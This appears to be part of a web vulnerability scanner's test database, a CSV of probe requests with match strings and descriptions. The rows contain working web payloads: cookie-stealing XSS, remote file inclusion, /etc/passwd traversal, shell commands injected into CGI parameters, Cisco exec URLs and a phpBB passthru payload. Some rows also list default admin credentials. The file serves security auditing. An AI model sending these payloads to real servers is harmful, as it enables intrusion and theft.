"001180","817","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server\.javawebserver\.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","",""
"001181","3092","b","/shopadmin.asp","GET","200","","","","","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.","",""
"001182","3848","c","/modsecurity.php?inc_prefix=@RFIURL","GET","PHP Version","","","","","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/","",""
"001183","4268","c","/phpBB2/includes/db.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.","",""
"001184","6662","4","/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001185","28260","3","/_vti_bin/shtml.exe/junk_nonexistant.exe","GET",":\\\\","","","Unknown CONTENT_TYPE","","This exe shows the full web path when a non-existent file is requested.","",""
"001186","3092","1b","/_vti_txt/_vti_cnf/","GET","200","","","","","FrontPage directory found.","",""
"001187","3092","1b","/_vti_txt/","GET","200","","","","","FrontPage directory found.","",""
"001188","3092","23","/_vti_pvt/deptodoc.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","",""
"001189","3092","23","/_vti_pvt/doctodep.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","",""
"001190","3092","23","/_vti_pvt/services.org","GET","200","","","","","FrontPage file found. This may contain useful information.","",""
"001191","28260","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings. CVE-2000-0413, CVE-2000-0709, CVE-2000-0710, BID-1608, BID-1174.","",""
"001192","28260","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","",""
"001193","3092","a","/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","",""
"001194","3092","a","/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","",""
"001195","3092","ad","/_vti_bin/_vti_aut/dvwssr.dll","GET","200","","","","","This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. MS00-025.","",""
"001196","3092","d","/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx","GET","The remote procedure call failed","","","","","This dll is vulnerable to a remote overflow that can allow attackers to execute remote commands.","",""
"001197","3092","d","/_vti_bin/_vti_aut/fp30reg.dll","GET","200","","","","","Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/ms03-051.asp for details.","",""
"001198","473","23","/_vti_pvt/access.cnf","GET","200","","","","","Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.","",""
"001199","473","23","/_vti_pvt/botinfs.cnf","GET","vti_encoding","","","","","FrontPage file found. This may contain useful information.","",""
"001200","473","23","/_vti_pvt/bots.cnf","GET","vti_encoding","","","","","FrontPage file found. This may contain useful information.","",""
"001201","473","23","/_vti_pvt/service.cnf","GET","200","","","","","Contains meta-information about the web server Remove or ACL if FrontPage is not being used.","",""
"001202","473","23","/_vti_pvt/services.cnf","GET","200","","","","","Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.","",""
"001203","473","23","/_vti_pvt/svacl.cnf","GET","200","","","","","File used to store whether subwebs have unique permissions settings and any IP address restrictions.  Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.","",""
"001204","473","23","/_vti_pvt/writeto.cnf","GET","200","","","","","Contains information about form handler result files. Remove or ACL if FrontPage is not being used.","",""
"001205","473","3","/_vti_pvt/linkinfo.cnf","GET","200","","","","","IIS file shows http links on and off site. Might show host trust relationships and other machines on network.","",""
"001206","3233","b","/admin/","GET","Tomcat's administration web application","","","","","Tomcat is installed, however the administration package does not appear to be.","",""
"001207","3092","b","/isx.html","GET","InfraStruXure Manager","","","","","APC InfraStruXure Manager management page found. Content may reveal software version.","",""
"001208","5544","7","///","GET","Acme\.Serve v1\.7","","","","","Acme.Serve allows arbitrary file retrieval","",""
"001209","3233","3","@CGIDIRSblog/mt-check.cgi","GET","Current working directory","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","",""
"001210","9239","4","/mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001211","16207","4","/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001212","3233","b","/mailman/listinfo","GET","mailing list","","","","","Mailman was found on the server.","",""
"001213","48","3","/doc/","GET","200","","","","","The /doc/ directory is browsable. This may be /usr/doc.","",""
"001214","48","3","/doc","GET","200","","","","","The /doc directory is browsable. This may be /usr/doc.","",""
"001215","682","4","/webalizer/","GET","Generated by The Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).","",""
"001216","682","4","/web/","GET","Generated by The Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001217","682","4","/usage/","GET","Generated by The Webalizer","","","","","Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001218","3092","3","/sitemap.xml","GET","200","","<urlset","","","This gives a nice listing of the site content.","",""
"001220","18265","c","/photo_album/apa_phpinclude.inc.php?apa_module_basedir=@RFIURL","GET","PHP Version","","","","","Atomic Photo Album could allow remote source inclusion.","",""
"001221","250","a","/cgis/wwwboard/wwwboard.cgi","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","",""
"001222","250","a","/cgis/wwwboard/wwwboard.pl","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","",""
"001223","25499","4","/affich.php?image=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","",""
"001224","25498","4","/diapo.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","",""
"001225","25497","4","/index.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","",""
"001226","376","7","/admin/contextAdmin/contextAdmin.html","GET","200","","","","","Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.","",""
"001227","700","4","/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001228","3954","4","/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001229","700","4","/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001230","3954","4","/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001231","568","3","/blahb.ida","GET","200","","","file blahb\.ida could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","",""
"001232","568","3","/blahb.idq","GET","200","","","file blahb\.idq could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","",""
"001233","19957","a","/ab2/\@AdminViewError","GET","200","","","","","Sun Answerbook allows viewing of the error logs without authentication.","",""
"001236","16014","4","/\"><img%20src=\"javascript:alert(document.domain)\">","GET","<img src=\"javascript:alert\(document\.domain\)\">","","","","","The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001237","3233","3","/Survey/Survey.Htm","GET","System Components","","","","","This Compaq device, without authentication, gives lots of system information.","",""
"001238","3233","3","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","GET","General Information","","","","","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL","",""
"001239","8679","a","/ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar","GET","200","","","","","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'.","",""
"001240","14633","4","/ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> ","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Sun Answerbook is vulnerable to XSS in the search field.","",""
"001241","19947","4","/apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001242","3233","23","dba4.nsf","GET","DB Analysis","","","","","This Lotus Domino page contains database views that disclose sensitive information.","",""
"001243","2117","b","/BACLIENT","GET","200","","","","","IBM Tivoli default file found.","",""
"001244","3233","1b","/postinfo.html","GET","Web Publishing Information","","","","","Microsoft FrontPage default file found.","",""
"001245","30092","3b","/na_admin/ataglance.html","GET","Filer At","","","","","NetApp application displays detailed system information.","",""
"001246","1210","7","/scripts/samples/search/qfullhit.htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. MS00-006.","",""
"001247","1210","7","/scripts/samples/search/qsumrhit.htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. MS00-006.","",""
"001248","1210","7","/JUNK(5).htw","GET","QUERY","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""
"001251","787","28a","http://127.0.0.1:2301/ HTTP/1.0","GET","Compaq WBEM Device","","","","","The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html","",""
"001252","847","37","/file/../../../../../../../../etc/","GET","200","","","","","The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval.","",""
"001253","578","8","/level/16/exec/-///pwd","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001254","578","8","/level/16/exec/-///show/configuration","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001255","578","8","/level/16","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001256","578","8","/level/16/exec/","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001257","578","8","/level/16/exec//show/access-lists","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001258","578","8","/level/16/level/16/exec//show/configuration","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001259","578","8","/level/16/level/16/exec//show/interfaces","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001260","578","8","/level/16/level/16/exec//show/interfaces/status","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001261","578","8","/level/16/level/16/exec//show/version","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001262","578","8","/level/16/level/16/exec//show/running-config/interface/FastEthernet","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001263","578","8","/level/16/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001264","578","8","/level/17/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001265","578","8","/level/18/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001266","578","8","/level/19/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001267","578","8","/level/20/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001268","578","8","/level/21/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001269","578","8","/level/22/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001270","578","8","/level/23/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001271","578","8","/level/24/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001272","578","8","/level/25/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001273","578","8","/level/26/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001274","578","8","/level/27/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001275","578","8","/level/28/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001276","578","8","/level/29/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001277","578","8","/level/30/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001278","578","8","/level/31/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001279","578","8","/level/32/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001280","578","8","/level/33/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001281","578","8","/level/34/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001282","578","8","/level/35/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001283","578","8","/level/36/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001284","578","8","/level/37/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001285","578","8","/level/38/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001286","578","8","/level/39/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001287","578","8","/level/40/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001288","578","8","/level/41/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001289","578","8","/level/42/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001290","578","8","/level/43/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001291","578","8","/level/44/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001292","578","8","/level/45/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001293","578","8","/level/46/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001294","578","8","/level/47/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001295","578","8","/level/48/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001296","578","8","/level/49/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001297","578","8","/level/50/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001298","578","8","/level/51/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001299","578","8","/level/52/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001300","578","8","/level/53/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001301","578","8","/level/54/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001302","578","8","/level/55/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001303","578","8","/level/56/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001304","578","8","/level/57/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001305","578","8","/level/58/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001306","578","8","/level/59/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001307","578","8","/level/60/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001308","578","8","/level/61/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001309","578","8","/level/62/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001310","578","8","/level/63/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001311","578","8","/level/64/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001312","578","8","/level/65/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001313","578","8","/level/66/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001314","578","8","/level/67/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001315","578","8","/level/68/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001316","578","8","/level/69/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001317","578","8","/level/70/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001318","578","8","/level/71/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001319","578","8","/level/72/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001320","578","8","/level/73/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001321","578","8","/level/74/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001322","578","8","/level/75/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001323","578","8","/level/76/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001324","578","8","/level/77/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001325","578","8","/level/78/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001326","578","8","/level/79/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001327","578","8","/level/80/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001328","578","8","/level/81/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001329","578","8","/level/82/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001330","578","8","/level/83/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001331","578","8","/level/84/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001332","578","8","/level/85/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001333","578","8","/level/86/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001334","578","8","/level/87/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001335","578","8","/level/88/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001336","578","8","/level/89/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001337","578","8","/level/90/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001338","578","8","/level/91/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001339","578","8","/level/92/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001340","578","8","/level/93/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001341","578","8","/level/94/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001342","578","8","/level/95/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001343","578","8","/level/96/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001344","578","8","/level/97/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001345","578","8","/level/98/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001346","578","8","/level/99/exec//show","GET","200","","","","","CISCO HTTP service allows remote execution of commands","",""
"001347","10359","c","/gallery/captionator.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","",""
"001348","10359","c","/gallery/errors/configmode.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","",""
"001350","10359","c","/gallery/errors/reconfigure.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","",""
"001351","10359","c","/gallery/errors/unconfigured.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.1 through 1.3.0 contains a flaw that could allow remote attackers to include remote PHP via the GALLERY_BASEDIR variable.","",""
"001352","18810","3","/users.lst","GET","200","","","","","LocalWEB2000 users.lst passwords found","",""
"001353","13405","23","/WS_FTP.LOG","GET","200","","","","","WS_FTP.LOG file was found. It may contain sensitive information.","",""
"001354","8956","7","/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu","GET","root:","","","","","Remote file retrieval.","",""
"001355","3720","23","/examples/jsp/snp/snoop.jsp","GET","Request Information","","","","","Displays information about page retrievals, including other users.","",""
"001356","3715","23","/nsn/env.bas","GET","200","","","","","Novell web server shows the server environment and is vulnerable to cross-site scripting","",""
"001357","3722","23","/lcgi/lcgitest.nlm","GET","200","","","","","Novell web server shows the server environment","",""
"001358","13404","2","/com/","GET","200","","","","","Novell web server allows directory listing","",""
"001359","13402","2","/com/novell/","GET","200","","","","","Novell web server allows directory listing","",""
"001360","13403","2","/com/novell/webaccess","GET","200","","","","","Novell web server allows directory listing","",""
"001361","10944","18","@CGIDIRS","GET","match","","","","","text goes here","",""
"001362","8193","7","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc","GET","passwd","","","","","EW FileManager for PostNuke allows arbitrary file retrieval.","",""
"001363","8193","7","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd","GET","root:","","","","","EW FileManager for PostNuke allows arbitrary file retrieval.","",""
"001364","3093","1","@CGIDIRSccbill-local.pl?cmd=MENU","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"001365","3093","1","@CGIDIRSccbill-local.cgi?cmd=MENU","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"001366","3093","1","@CGIDIRSmastergate/search.cgi?search=0&search_on=all","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"001367","3093","1","@CGIDIRSBackup/add-passwd.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"001368","13243","8","@CGIDIRSsendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message","GET","passwd","","","","","sendpage.pl allows command execution via the message variable.","",""
"001369","1642","8","@CGIDIRSgbook/gbook.cgi?_MAILTO=xx;ls","GET","200","","","","","gbook.cgi allows command execution.","",""
"001370","7161","8","@CGIDIRSbslist.cgi?email=x;ls","GET","200","","","","","BSList allows command execution.","",""
"001371","7162","8","@CGIDIRSbsguest.cgi?email=x;ls","GET","200","","","","","BSGuest allows command execution.","",""
"001372","10902","3","@CGIDIRSnbmember.cgi?cmd=list_all_users","GET","200 ","","","","","Netbilling ndmember.cgi reveals sensitive information.","",""
"001373","4804","a","//admin/admin.shtml","GET","200","","","","","Axis network camera may allow admin bypass by using double-slashes before URLs.","",""
"001374","4808","70","/axis-cgi/buffer/command.cgi","GET","200","","","","","Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.","",""
"001375","4806","3","/support/messages","GET","200","","","","","Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html","",""
"001376","3093","8","@CGIDIRSwhere.pl?sd=ls%20/etc","GET","passwd","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"001377","3268","23","@CGIDIRS","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001378","12606","4","/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001379","12607","4","/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001380","12606","4","/bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001381","12607","4","/bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001382","12606","4","/eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001383","12607","4","/eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""
"001384","12184","3","/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000","GET","phpinfo","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","",""
"001385","12184","3","/some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42","GET","200","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","",""
"001386","12184","3","/some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42","GET","200","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","",""
"001387","12184","3","/some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42","GET","200","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","",""
"001388","11719","89","/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001389","11719","89","/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001390","11719","89","@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001391","11719","89","@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001392","11719","89","@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
